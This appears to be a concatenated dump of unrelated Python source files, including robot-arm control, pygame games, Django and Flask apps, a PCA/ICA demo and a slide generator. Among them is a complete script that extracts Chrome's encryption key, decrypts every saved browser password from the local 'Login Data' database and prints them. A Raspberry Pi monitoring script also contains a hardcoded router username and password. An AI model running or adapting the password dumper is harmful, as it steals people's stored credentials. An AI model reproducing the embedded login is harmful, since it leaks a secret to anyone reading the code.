self.group.stop()
# 4 - CLEAR TARGET GOAL
self.group.clear_pose_targets()
def search_tag(self):
# DEFINE A VARIABLE FORMAT EQUIVALENT TO JOINTS
jointTarget = self.group.get_current_joint_values()
# VERIFY IF THE TARGET DEGREE IS HIGHER THAN J1 LIMIT
if (jointTarget[0]*pi/180) + ROTATION_DEGREE <= J1_LIMIT_DEGREE:
rospy.loginfo('J1 Limit Exit!')
sys.exit()
# SEARCH TAG
else:
jointTarget[0] = jointTarget[0] + (ROTATION_DEGREE*pi/180)
self.group.go(joints=jointTarget, wait=True)
self.group.stop()
self.group.clear_pose_targets()
# FUNCTION - SET SPECIFIC JOINT
def set_joint_go(self, jointIndex, joint_angle_rad):
# TRANSFORMATION
jointIndex = jointIndex - 1 # TRANSLATE TO i-1 INDEX
# 1 - DEFINE A VARIABLE FORMAT EQUIVALENT TO JOINTS
joint_goal = self.group.get_current_joint_values()
# 2 - INSERT DESIRED ANGLE
joint_goal[jointIndex] = joint_angle_rad
# 3 - GO!
self.group.go(joints=joint_goal, wait=True)
# 4 - STOP ANY RESIDUAL MOVEMENT
self.group.stop()
# 5 - CLEAR TARGET GOAL
self.group.clear_pose_targets()
# FUNCTION - PROCESS ROUTINE
def detect_catch_routine(self):
## STEP 1 - OPEN GRIPPER
self.go_to_pose('pHome')
## STEP 2 - GO TO SEARCH ZONE
self.go_to_pose('pSearch')
## 2.1 - INIT FLAGS
self.init_pose = 1
self.tag_found = 0
# STEP 3 - SEARCH THE TAG
while not rospy.is_shutdown():
# 3.1 - IF TAG WAS NOT FOUND, ROTATE
if self.tag_found is 0:
self.search_tag()
rospy.loginfo('############# ROTATION COMPLETE')
# 3.2 - IF TAG WAS FOUND, GO TO TARGET POSITION
elif self.tag_found is 1:
rospy.loginfo('############# TAG FOUND')
# GO TO CATCH POSITION
self.go_to_pose('pCatch')
# GO TO CATCH POSITION BOTTLE
self.go_to_pose('pCatchBottle')
# CATCH WITH GRIPPER
self.set_joint_go(7, 1.0)
# GET UP THE BOTTLE
self.set_joint_go(5, -0.95)
# GO TO SEARCH INIT
self.go_to_pose('pSearch')
# OPEN THE GRIPPER
self.set_joint_go(7, 2.0)
# FINISH PROGRAM
sys.exit()
# AUXILIAR FUNCTION FOR SEVERAL TESTS
def test_routine(self):
#self.go_to_pose('pHome')
#self.go_to_pose('pSearch')
#self.go_to_pose('pCatch')
self.go_to_pose('pCatchBottle')
self.set_joint_go(7, 1.0)
self.set_joint_go(5, -0.95)
if __name__ == '__main__':
try:
# INITIALIZE YOUR OBJECT
omanip = openManipulatorPRO()
# INITIALIZE THE OPERATION BY CLICKING ENTER
raw_input("Press Enter to start!")
# OPERATION
omanip.detect_catch_routine()
except rospy.ROSInterruptException:
pass
except KeyboardInterrupt:
pass | 5,547 | 1,946 |
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
import os
import unittest
import avb
import avb.utils
test_file_01 = os.path.join(os.path.dirname(__file__), 'test_files', 'test_file_01.avb')
class TestRead(unittest.TestCase):
def test_basic(self):
with avb.open(test_file_01) as f:
for item in f.content.mobs:
pass
# print(item)
def test_read_all_known_classes(self):
with avb.open(test_file_01) as f:
for i, chunk in enumerate(f.chunks()):
if chunk.class_id in avb.utils.AVBClaseID_dict:
item = f.read_object(i)
# print(item)
if __name__ == "__main__":
unittest.main()
| 780 | 270 |
import sys, pygame
from pygame.locals import *
import time
import pygame.freetype
pygame.init()
size = width, height = 800, 600
ball_speed = [3, 7]
black = 0, 0, 0
rod_speed = [5,0]
score = 1
green = (0, 255, 0)
blue = (0, 0, 128)
white = (255, 255, 255)
screen = pygame.display.set_mode(size)
#ball loading and shortning its image size
ball_img = pygame.image.load("image.jpeg")
ball = pygame.transform.scale(ball_img,(80,50))
ballrect = ball.get_rect()
#setting the caption for game
pygame.display.set_caption("Rod and Ball Game")
#rod loading and shortning its image size
rod_img = pygame.image.load("rod.png")
rod = pygame.transform.scale(rod_img,(100,20))
rodrect = rod.get_rect()
font = pygame.font.Font('freesansbold.ttf', 32)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
#image collision function added
if ballrect.colliderect(rodrect):
score +=1
#print(score)
elif ballrect.top < 0:
print(score)
screen.fill(white)
text = font.render('Your Score ' + str(score), True, green, blue)
textRect = text.get_rect()
textRect.center = (width // 2, height // 2)
screen.blit(text, textRect)
pygame.display.update()
pygame.quit()
pygame.time.delay(2000)
quit()
#ball code
ballrect = ballrect.move(ball_speed)
if ballrect.left < 0 or ballrect.right > width:
ball_speed[0] = -ball_speed[0]
if ballrect.top < 0 or ballrect.bottom > height:
ball_speed[1] = -ball_speed[1]
#rod code
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RIGHT:
if rod_speed[0] > 0:
rod_speed[0] = -rod_speed[0]
elif event.key == pygame.K_LEFT:
if rod_speed[0] < 0:
rod_speed[0] = -rod_speed[0]
rodrect = rodrect.move(rod_speed)
if rodrect.left < 0 or rodrect.right > width:
rod_speed[0] = -rod_speed[0]
#screen pixels and setting adjustment
screen.fill(black)
screen.blit(ball, ballrect)
screen.blit(rod, rodrect)
#turning full image upside down
screen.blit(pygame.transform.rotate(screen, 180), (0, 0))
pygame.display.flip()
| 2,278 | 835 |
import pyclipper
from shapely.geometry import Polygon
from typing import List
from oasis.util import clean_polygon, convert_to_clipper, convert_from_clipper
class ClipperOffsetting():
def __init__(self, poly : Polygon, clipper_scale : int = 1000) -> None:
self.poly = clean_polygon(poly)
self.offsetter = pyclipper.PyclipperOffset()
self.clipper_scale = clipper_scale
cl_path = convert_to_clipper(self.poly, self.clipper_scale)
self.offsetter.AddPaths(cl_path, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
def get_offset(self, dist : float, n_contour: int = 1) -> List[Polygon]:
result = []
for i in range(n_contour):
c_path = self.offsetter.Execute(-1*dist*i*self.clipper_scale)
poly = convert_from_clipper(c_path, self.clipper_scale)
result.append(poly)
return result | 888 | 304 |
from __future__ import absolute_import
from social_auth.middleware import SocialAuthExceptionMiddleware
from sentry.utils import auth
from sentry.utils.http import absolute_uri
class SentrySocialAuthExceptionMiddleware(SocialAuthExceptionMiddleware):
def get_redirect_uri(self, request, exception):
return absolute_uri(auth.get_login_url())
| 357 | 97 |
# Generated by Django 2.1.3 on 2018-11-27 09:55
import attrs.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [("app", "0001_initial")]
operations = [
migrations.CreateModel(
name="Visit",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=100)),
("attrs", attrs.fields.AttrsField(default=dict, editable=False)),
(
"protocol",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="app.Protocol"
),
),
],
)
]
| 1,013 | 274 |
# -*-coding:utf-8-*-
"""
程序启动参数定义、获取与解析
@author Myles Yang
"""
import argparse
import const_config as const
""" 设置命令参数时的KEY """
# 程序运行方式
ARG_KEY_RUN = ARG_RUN = '--run'
# 程序日志记录方式
ARG_KEY_LOG = ARG_LOG = '--log'
# 创建程序快捷方式
ARG_KEY_LNK = ARG_LNK = '--lnk'
# 启动环境
ARG_KEY_ENV = ARG_ENV = '--env'
# 运行中可执行指令
ARG_KEY_CMD = ARG_CMD = '--cmd'
""" --run 命令参数选项 """
# 控制台启动
ARG_RUN_TYPE_CONSOLE = 'console'
# 控制台后台启动
ARG_RUN_TYPE_BACKGROUND = 'background'
# 开机自启,控制台后台启动
ARG_RUN_TYPE_POWERBOOT = 'powerboot'
# 启动WEBUI
ARG_RUN_TYPE_WEBUI = 'webui'
# 创建快捷方式
ARG_RUN_TYPE_LNK = 'lnk'
# 发送执行命令
ARG_RUN_TYPE_CMD = 'cmd'
# 选择项
CHOICES_ARG_RUN_TYPE = [ARG_RUN_TYPE_CONSOLE, ARG_RUN_TYPE_BACKGROUND, ARG_RUN_TYPE_POWERBOOT,
ARG_RUN_TYPE_WEBUI, ARG_RUN_TYPE_LNK, ARG_RUN_TYPE_CMD]
""" --log 命令参数选项 """
# 控制台打印方式记录运行日志
ARG_LOG_TYPE_CONSOLE = 'console'
# 文件方式记录运行日志
ARG_LOG_TYPE_FILE = 'file'
# 文件和控制台打印方式记录运行日志
ARG_LOG_TYPE_BOTH = 'both'
# 禁用日志记录
ARG_LOG_TYPE_NONE = 'none'
# 选择项
CHOICES_ARG_LOG_TYPE = [ARG_LOG_TYPE_CONSOLE, ARG_LOG_TYPE_FILE, ARG_LOG_TYPE_BOTH, ARG_LOG_TYPE_NONE]
""" --env 命令参数选项 """
# 生产环境
ARG_ENV_TYPE_PROD = 'prod'
# 开发环境
ARG_ENV_TYPE_DEV = 'dev'
# 选择项
CHOICES_ARG_ENV_TYPE = [ARG_ENV_TYPE_PROD, ARG_ENV_TYPE_DEV]
""" --cmd 命令参数选项 """
# 下一张壁纸
ARG_CMD_TYPE_NXT = 'nxt'
# 上一张壁纸
ARG_CMD_TYPE_PRE = 'pre'
# 收藏当前壁纸
ARG_CMD_TYPE_FAV = 'fav'
# 定位当前壁纸
ARG_CMD_TYPE_LOC = 'loc'
# 选择项
CHOICES_ARG_CMD_TYPE = [ARG_CMD_TYPE_NXT, ARG_CMD_TYPE_PRE, ARG_CMD_TYPE_FAV, ARG_CMD_TYPE_LOC]
"""
定义命令行输入参数
"""
parser = argparse.ArgumentParser(
prog=const.app_name,
description='{}命令行参数'.format(const.app_name),
)
parser.add_argument('-r', ARG_RUN,
help='指定程序的运行方式',
type=str,
choices=CHOICES_ARG_RUN_TYPE,
dest=ARG_KEY_RUN
)
parser.add_argument('-l', ARG_LOG,
help='指定运行日志记录方式',
type=str,
choices=CHOICES_ARG_LOG_TYPE,
dest=ARG_KEY_LOG
)
parser.add_argument('-e', ARG_ENV,
help='指定程序的运行环境',
type=str,
choices=CHOICES_ARG_ENV_TYPE,
dest=ARG_KEY_ENV,
default=ARG_ENV_TYPE_PROD
)
parser.add_argument('-s', ARG_LNK,
help='根据给的路径创建程序的快捷方式,与--run组合使用',
type=str,
nargs='*',
dest=ARG_KEY_LNK
)
parser.add_argument('-c', ARG_CMD,
help='运行中可执行指令,与--run组合使用',
type=str,
choices=CHOICES_ARG_CMD_TYPE,
dest=ARG_KEY_CMD
)
arg_dict = vars(parser.parse_args())
| 2,798 | 1,489 |
from puzzle.constraints import constraints, validator
from puzzle.puzzlepedia import annotation_widget
from spec.mamba import *
widget_patch = mock.patch('puzzle.puzzlepedia.annotation_widget.widgets')
class TestConstraints(constraints.Constraints):
test: str = 'value'
with description('annotation_widget'):
with before.each:
self.mock_widgets = widget_patch.start()
with after.each:
widget_patch.stop()
with it('renders NumberInRange as a FloatSlider'):
annotation_widget.AnnotationWidget(
validator.NumberInRange(0.0, 2.0), TestConstraints(), 'test', 1.0,
None,
mock.Mock())
expect(self.mock_widgets.FloatSlider).to(have_been_called)
| 693 | 221 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
_EXCLUDED_PATHS = []
_LICENSE_HEADER = (
r".*? Copyright \(c\) 20\d\d The Chromium Authors\. All rights reserved\."
"\n"
r".*? Use of this source code is governed by a BSD-style license that can "
"be\n"
r".*? found in the LICENSE file\."
"\n"
)
def _CommonChecksImpl(input_api, output_api):
results = []
results += input_api.canned_checks.PanProjectChecks(
input_api, output_api, excluded_paths=_EXCLUDED_PATHS)
from trace_viewer import build
from tvcm import presubmit_checker
checker = presubmit_checker.PresubmitChecker(input_api, output_api)
results += checker.RunChecks()
from trace_viewer.build import check_gyp
gyp_result = check_gyp.GypCheck()
if len(gyp_result) > 0:
results += [output_api.PresubmitError(gyp_result)]
from trace_viewer.build import check_gn
gn_result = check_gn.GnCheck()
if len(gn_result) > 0:
results += [output_api.PresubmitError(gn_result)]
black_list = input_api.DEFAULT_BLACK_LIST
sources = lambda x: input_api.FilterSourceFile(x, black_list=black_list)
results += input_api.canned_checks.CheckLicense(
input_api, output_api, _LICENSE_HEADER,
source_file_filter=sources)
return results
def _CommonChecks(input_api, output_api):
tvcm_path = input_api.change.RepositoryRoot()
sys.path.append(tvcm_path)
try:
return _CommonChecksImpl(input_api, output_api)
finally:
sys.path.remove(tvcm_path)
def CheckChangeOnUpload(input_api, output_api):
return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return _CommonChecks(input_api, output_api)
| 1,805 | 670 |
import FWCore.ParameterSet.Config as cms
# Ideal geometry, needed for simulation
from SLHCUpgradeSimulations.Geometry.Phase1_R30F12_cmsSimIdealGeometryXML_cff import *
from Geometry.TrackerNumberingBuilder.trackerNumbering2026Geometry_cfi import *
| 249 | 87 |
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta
def chrome_date_and_time(chrome_data):
# Chrome_data format is 'year-month-date
# hr:mins:seconds.milliseconds
# This will return datetime.datetime Object
return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)
def fetching_encryption_key():
# Local_computer_directory_path will look
# like this below
# C: => Users => <Your_Name> => AppData =>
# Local => Google => Chrome => User Data =>
# Local State
local_computer_directory_path = os.path.join(
os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_computer_directory_path, "r", encoding="utf-8") as f:
local_state_data = f.read()
local_state_data = json.loads(local_state_data)
# decoding the encryption key using base64
encryption_key = base64.b64decode(
local_state_data["os_crypt"]["encrypted_key"])
# remove Windows Data Protection API (DPAPI) str
encryption_key = encryption_key[5:]
# return decrypted key
return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
def password_decryption(password, encryption_key):
try:
iv = password[3:15]
password = password[15:]
# generate cipher
cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
# decrypt password
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return "No Passwords"
def main():
key = fetching_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromePasswords.db"
shutil.copyfile(db_path, filename)
# connecting to the database
db = sqlite3.connect(filename)
cursor = db.cursor()
# 'logins' table has the data
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
"order by date_last_used")
# iterate over all rows
for row in cursor.fetchall():
main_url = row[0]
login_page_url = row[1]
user_name = row[2]
decrypted_password = password_decryption(row[3], key)
date_of_creation = row[4]
last_usuage = row[5]
if user_name or decrypted_password:
print(f"Main URL: {main_url}")
print(f"Login URL: {login_page_url}")
print(f"User name: {user_name}")
print(f"Decrypted Password: {decrypted_password}")
else:
continue
if date_of_creation != 86400000000 and date_of_creation:
print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}")
if last_usuage != 86400000000 and last_usuage:
print(f"Last Used: {str(chrome_date_and_time(last_usuage))}")
print("=" * 100)
cursor.close()
db.close()
try:
# trying to remove the copied db file as
# well from local computer
os.remove(filename)
except:
pass
if __name__ == "__main__":
main()
| 3,043 | 1,189 |
import os
from flask import Flask, request, redirect, url_for, render_template, send_from_directory, jsonify
from werkzeug import secure_filename
import uuid
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'upload/'
app.config['REPLY_FOLDER'] = 'replies/'
app.config['CLIENT_FOLDER'] = 'client/'
def upload_file_to_folder(folder, filename):
content = request.form['content']
if content:
file = open(os.path.join(folder, filename), "w+")
file.write(content)
file.close()
return True
return False
@app.route('/api/reply_to/<codename>', methods=['POST'])
def reply(codename):
codename = "".join(codename.strip().replace("+", "").split(" "))
filename = secure_filename(codename + ".json")
print(filename)
if upload_file_to_folder(app.config['REPLY_FOLDER'], filename):
return "Ok"
return "Content is empty", 405
@app.route('/api/fetch_reply/<codename>', methods=['GET'])
def fetch_reply(codename):
codename = "".join(codename.strip().replace("+", "").split(" "))
filename = secure_filename(codename + ".json")
return send_from_directory(app.config['REPLY_FOLDER'], filename)
@app.route('/api/submit', methods=['POST'])
def submit():
id = str(uuid.uuid4())
filename = secure_filename(id+".asc")
if upload_file_to_folder(app.config['UPLOAD_FOLDER'], filename):
return id
return "Content is empty", 405
# content = request.form['content']
#
# if content:
# filename = secure_filename(id+".asc")
# file = open(os.path.join(app.config['UPLOAD_FOLDER'], filename), "w+")
# file.write(content)
# file.close()
# return id
# else:
# return "Content is empty", 405
@app.route('/api/submissions', methods=['GET'])
def list_submissions():
files = os.listdir(app.config['UPLOAD_FOLDER'])
files.remove(".gitignore")
return jsonify(files=sorted(files, key=lambda f:
os.stat(os.path.join(app.config['UPLOAD_FOLDER'],f)).st_mtime, reverse=True))
@app.route('/api/submissions/<path:path>', methods=['GET'])
def fetch_submission(path):
return send_from_directory(app.config['UPLOAD_FOLDER'], path)
@app.route('/')
def default():
return serve_client('index.html')
@app.route('/<path:path>')
def serve_client(path):
return send_from_directory(app.config['CLIENT_FOLDER'], path)
if __name__ == "__main__":
app.run(port=5011, debug=True)
| 2,437 | 841 |
from tkinter import *
from tkinter import filedialog
import os
def openFile():
filepath = filedialog.askopenfilename(initialdir="/",title="Open file",filetypes= (("text files","*.txt"),("all files","*.*")))
os.startfile(filepath)
window = Tk()
button = Button(text="OpenFile",command=openFile)
button.pack()
window.mainloop() | 346 | 112 |
from django.conf.urls import patterns, include, url
from ats.views import *
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'bcauth_project.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^job/(?P<job_id>\d+)/', JobView.as_view(), name='ats_job'),
url(r'^jobs/', JobListView.as_view(), name='ats_jobs'),
url(r'^applicants/', ApplicantListView.as_view(), name='ats_applicants'),
url(r'^create/', JobCreateView.as_view(), name='ats_create'),
url(r'^users/', UserListView.as_view(), name='ats_users'),
url(r'^osrc/', GitHubListView.as_view(), name='ats_osrc'),
url(r'^apply/(?P<job_id>\d+)/', ApplyView.as_view(), name='ats_apply'),
)
| 703 | 276 |
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"--T", type=int, default=46,
help="Time-horizon.")
args = parser.parse_args()
T = args.T
data_dir = 'dataForVI'
file_path = data_dir+'/'+'Vn'+str(T)+'.npy'
v = np.load(file_path)
df = pd.DataFrame(v)
# df = pd.read_csv(file_path)
y = df.values
plt.plot(y)
plt.savefig('plot_value.png')
plt.show()
print('Done') | 526 | 197 |
import time
import datetime
import threading
from get_net_info import RaspberryMonitorNetSpeed as rmn
import subprocess
import Adafruit_SSD1306
import Adafruit_GPIO.SPI as SPI
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
# Raspberry Pi pin configuration:
RST = None # on the PiOLED this pin isnt used
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0
# 128x64 display with hardware I2C:
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Initialize library.
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 2
font = ImageFont.load_default()
IP = subprocess.check_output(["hostname", "-I"]).split()[0]
print ('Local IP :'+str(IP))
ns = [-1, -1]
def network_speed():
global ns
b = rmn('admin', 'Sakuna0711')
while True:
time.sleep(1)
ns = b.get_human_speed()
#%%
def main():
tmp = threading.Thread(target=network_speed)
tmp.setDaemon(True)
tmp.start()
while True:
try:
draw.rectangle((0,0,width,height), outline=0, fill=0)
cmd = "top -bn1 | grep load | awk '{printf \"CPU Load: %.2f\", $(NF-2)}'"
CPU = subprocess.check_output(cmd, shell = True )
cmd = "free -m | awk 'NR==2{printf \"Mem: %s/%sMB %.2f%%\", $3,$2,$3*100/$2 }'"
MemUsage = subprocess.check_output(cmd, shell = True )
cmd = "df -h | awk '$NF==\"/\"{printf \"Disk: %d/%dGB %s\", $3,$2,$5}'"
Disk = subprocess.check_output(cmd, shell = True )
# Write some text.
draw.text((x, top), "IP: " + str(IP), font=font, fill=255)
draw.text((x, top+8), 'U/S: ' + str(ns[1]), font=font, fill=255)
draw.text((x, top+16), 'D/S: ' + str(ns[0]), font=font, fill=255)
draw.text((x, top+25), str(CPU), font=font, fill=255)
draw.text((x, top+33), str(MemUsage), font=font, fill=255)
draw.text((x, top+41), str(Disk), font=font, fill=255)
disp.image(image)
disp.display()
time.sleep(1)
except KeyboardInterrupt:
exit(0)
#%%
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| 2,808 | 1,014 |
# Rock, Paper, Scissors, Lizard, Spock - Advanced
# rpsls_adv.py for Python 3.4 | Written by Alex Vear
# Written: 19th December 2015 | Modified: 22nd December 2015
# Public domain. No rights reserved.
import random
playAgain='y'
while playAgain=='y' or playAgain=='Y':
win=0
print("\nScissors cuts Paper \nPaper covers Rock \nRock crushes Lizard \nLizard poisons Spock \nSpock smashes Scissors \nScissors decapitates Lizard \nLizard eats Paper \nPaper disproves Spock \nSpock vaporizes Rock \n(and as it always has) Rock crushes Scissors. \n")
for i in range(0,3):
play=input('Rock, Paper, Scissors, Lizard, Spock!\n\nPlayer picks: ')
opp=random.choice(['rock', 'paper', 'scissors', 'lizard', 'spock'])
print('Sheldon picked:', opp)
if opp==play.lower(): print('Tie')
elif play=='Rock' or play=='rock':
if opp=='scissors' or opp=='lizard':
print('You Won')
win=win+1
else: print('You Lose')
elif play=='Paper' or play=='paper':
if opp=='rock' or opp=='spock':
print('You Won')
win=win+1
else: print('You Lose')
elif play=='Scissors' or play=='scissors':
if opp=='paper' or opp=='lizard':
print('You Won')
win=win+1
else: print('You Lose')
elif play=='Spock' or play=='spock':
if opp=='rock' or opp=='scissors':
print('You Won')
win=win+1
else: print('You Lose')
elif play=='Lizard' or play=='lizard':
if opp=='paper' or opp=='spock':
print('You Won')
win=win+1
else: print('You Lose')
else: print('Invalid Option')
print('\nYour Score: ', win, '/3\n')
playAgain=input("Would you like to play again? 'y' or 'n'\n")
print('\nThanks for playing.\n')
| 1,929 | 654 |
"""
==========================
FastICA on 2D point clouds
==========================
Illustrate visually the results of :ref:`ICA` vs :ref:`PCA` in the
feature space.
Representing ICA in the feature space gives the view of 'geometric ICA':
ICA is an algorithm that finds directions in the feature space
corresponding to projections with high non-Gaussianity. These directions
need not be orthogonal in the original feature space, but they are
orthogonal in the whitened feature space, in which all directions
correspond to the same variance.
PCA, on the other hand, finds orthogonal directions in the raw feature
space that correspond to directions accounting for maximum variance.
Here we simulate independent sources using a highly non-Gaussian
process, 2 student T with a low number of degrees of freedom (top left
figure). We mix them to create observations (top right figure).
In this raw observation space, directions identified by PCA are
represented by green vectors. We represent the signal in the PCA space,
after whitening by the variance corresponding to the PCA vectors (lower
left). Running ICA corresponds to finding a rotation in this space to
identify the directions of largest non-Gaussianity (lower right).
"""
print __doc__
# Authors: Alexandre Gramfort, Gael Varoquaux
# License: BSD
import numpy as np
import pylab as pl
from sklearn.decomposition import PCA, FastICA
###############################################################################
# Generate sample data
rng = np.random.RandomState(42)
S = rng.standard_t(1.5, size=(20000, 2))
S[:, 0] *= 2.
# Mix data
A = np.array([[1, 1], [0, 2]]) # Mixing matrix
X = np.dot(S, A.T) # Generate observations
pca = PCA()
S_pca_ = pca.fit(X).transform(X)
ica = FastICA(random_state=rng)
S_ica_ = ica.fit(X).transform(X) # Estimate the sources
S_ica_ /= S_ica_.std(axis=0)
###############################################################################
# Plot results
def plot_samples(S, axis_list=None):
pl.scatter(S[:, 0], S[:, 1], s=2, marker='o', linewidths=0, zorder=10)
if axis_list is not None:
colors = [(0, 0.6, 0), (0.6, 0, 0)]
for color, axis in zip(colors, axis_list):
axis /= axis.std()
x_axis, y_axis = axis
# Trick to get legend to work
pl.plot(0.1 * x_axis, 0.1 * y_axis, linewidth=2, color=color)
# pl.quiver(x_axis, y_axis, x_axis, y_axis, zorder=11, width=0.01,
pl.quiver(0, 0, x_axis, y_axis, zorder=11, width=0.01,
scale=6, color=color)
pl.hlines(0, -3, 3)
pl.vlines(0, -3, 3)
pl.xlim(-3, 3)
pl.ylim(-3, 3)
pl.xlabel('x')
pl.ylabel('y')
pl.subplot(2, 2, 1)
plot_samples(S / S.std())
pl.title('True Independent Sources')
axis_list = [pca.components_.T, ica.get_mixing_matrix()]
pl.subplot(2, 2, 2)
plot_samples(X / np.std(X), axis_list=axis_list)
pl.legend(['PCA', 'ICA'], loc='upper left')
pl.title('Observations')
pl.subplot(2, 2, 3)
plot_samples(S_pca_ / np.std(S_pca_, axis=0))
pl.title('PCA scores')
pl.subplot(2, 2, 4)
plot_samples(S_ica_ / np.std(S_ica_))
pl.title('ICA estimated sources')
pl.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.26)
pl.show()
| 3,222 | 1,149 |
class SupabaseError(Exception):
"""Base class for all supabase errors
:param message: A human-readable error message string.
"""
def __init__(self, message):
Exception.__init__(self, message)
class ClientConnectorError(SupabaseError):
def __init__(self, message):
SupabaseError.__init__(self, message)
class QueryError(SupabaseError):
def __init__(self, message):
SupabaseError.__init__(self, message)
class InvalidRangeError(SupabaseError):
def __init__(self, message):
SupabaseError.__init__(self, message)
class UnexpectedValueTypeError(SupabaseError):
def __init__(self, message):
SupabaseError.__init__(self, message)
| 709 | 202 |
import os, sys
from PIL import Image
### TERMINAL ARGUMENTS ###
# -h := help
# -q := quiet
# -single := forced one page per slide
args = sys.argv[1:]
# -h, print README and quit
if "-h" in args:
with open('./README.md') as f:
print(f.read())
quit()
# -q, toggle print statements
loud = True
if "-q" in args:
loud = False
# -single, toggle forced single image per slide
double = True
if "-single" in args:
double = False
def verifyDirectory(dirname):
if not os.path.isdir(dirname):
try:
os.mkdir(dirname)
except OSError:
if loud: print("Could not create {} directory.".format(dirname))
quit()
verifyDirectory('./Sheets')
if not os.listdir('./Sheets'): # Empty sheets directory
if loud: print("No images to convert.")
verifyDirectory('./Slides')
### IMAGE MANIPULATION ###
# Is better suited for a double slide (two tall images side by side)?
def isTall(img):
# img = Image.open(img)
return img.size[0]/img.size[1] < (16/9)
# White dimensioned BG image
def bgImg(size):
return Image.new('RGB', size, (255,255,255))
def singleImage(img):
W, H = img.size
if W/H > (16/9):
size = W, int((9/16) * W)
else:
size = int((16/9) * H), H
# size = tuple(buff*x for x in size)
imgBG = bgImg(size)
imgBG.paste(img, (int((size[0] - W) / 2), int((size[1] - H) /2))) # Centered on BG
return imgBG
def twoImage(img1, img2):
# img1 = Image.open('./Sheets/{}'.format(img1))
# img2 = Image.open('./Sheets/{}'.format(img2))
W1, H1 = img1.size
W2, H2 = img2.size
imgBG = bgImg((W1 + W2, max(H1, H2)))
if H1 < H2:
imgBG.paste(img1, (0,int((H2-H1)/2)))
imgBG.paste(img2, (W1,0))
else: # H1 = H2 reduces to either case.
imgBG.paste(img1, (0,0))
imgBG.paste(img2, (W1,int((H1-H2)/2)))
return singleImage(imgBG)
def main():
imageFormats = ('.jpg', '.png') # If adding image formats, check compatibility with PIL.
pages = list(filter(lambda x: x.endswith(imageFormats), sorted(os.listdir('./Sheets'))))
pages = list(map(lambda x: Image.open('./Sheets/{}'.format(x)), pages))
os.chdir('./Slides')
filenum = 0
if double:
while pages:
if not pages[1:]:
singleImage(pages[0]).save('{}.png'.format(filenum))
if loud: print('e',pages[0])
break
elif isTall(pages[0]) and isTall(pages[1]):
twoImage(pages[0], pages[1]).save('{}.png'.format(filenum))
if loud: print('d',pages[0],pages[1])
pages = pages[2:]
else:
singleImage(pages[0]).save('{}.png'.format(filenum))
if loud: print('s',pages[0])
filenum += 1
else: # -single
for page in pages:
singleImage(page).save('{}.png'.format(filenum))
filenum += 1
if __name__ == "__main__":
main()
| 3,085 | 1,163 |
'''
Parse coverage checker html files.
Write out data to a csv.
INPUT: html files in MY_DATA_FOLDERS
OUTPUT: csv file called OUTPUT_FILE
'''
from os import walk
import re
MY_DATA_FOLDERS = ["cov_checker"] # Folder to be processed
OUTPUT_FILE = "output.csv" # csv output result
DIGITAL_SEVICES = set()
CHANNELS = set()
MYDATABASE = []
def findWithPattern(mystr, startPattern, endPattern):
"""
Find the string that starts with <startPattern> and ends with <endPattern> in the orginal string <mystr>.
Args:
mystr: orginal string.
startPattern:
endPattern:
Returns:
The found string,
and the remained part of the orginal string.
"""
x = mystr.find(startPattern)
if x==-1:
return "",mystr
mystr = mystr[x + len(startPattern):]
y = mystr.find(endPattern)
if y==-1:
return "",mystr
return mystr[:y], mystr[y+len(endPattern):]
# ------------FIRST PHASE----------------
# 1. Read through all the data files
# 2. Generate list of DIGITAL_SEVICES and CHANNELS
# 3. Log all the data into MYDATABASE
my_output_file = open (OUTPUT_FILE, "ab+")
def scan_all_files(log_data):
global DIGITAL_SEVICES
global CHANNELS
global MYDATABASE
DIGITAL_SEVICES = set()
CHANNELS = set()
MYDATABASE = []
for mypath in MY_DATA_FOLDERS:
# Process each folder
print "Reading folder " + mypath
# Retrieve all file in the folder
flist = []
for (dirpath, dirnames, filenames) in walk(mypath):
flist.extend(filenames)
break
# Process each file in the folder
count = 0
for filename in flist:
count = count + 1
if (count%1000==0):
print ("Processing file {0!s}000th".format(count/1000))
with open (mypath + "/" + filename, "r") as myfile:
# Read the file
data=myfile.read()
# Extract signalQuality
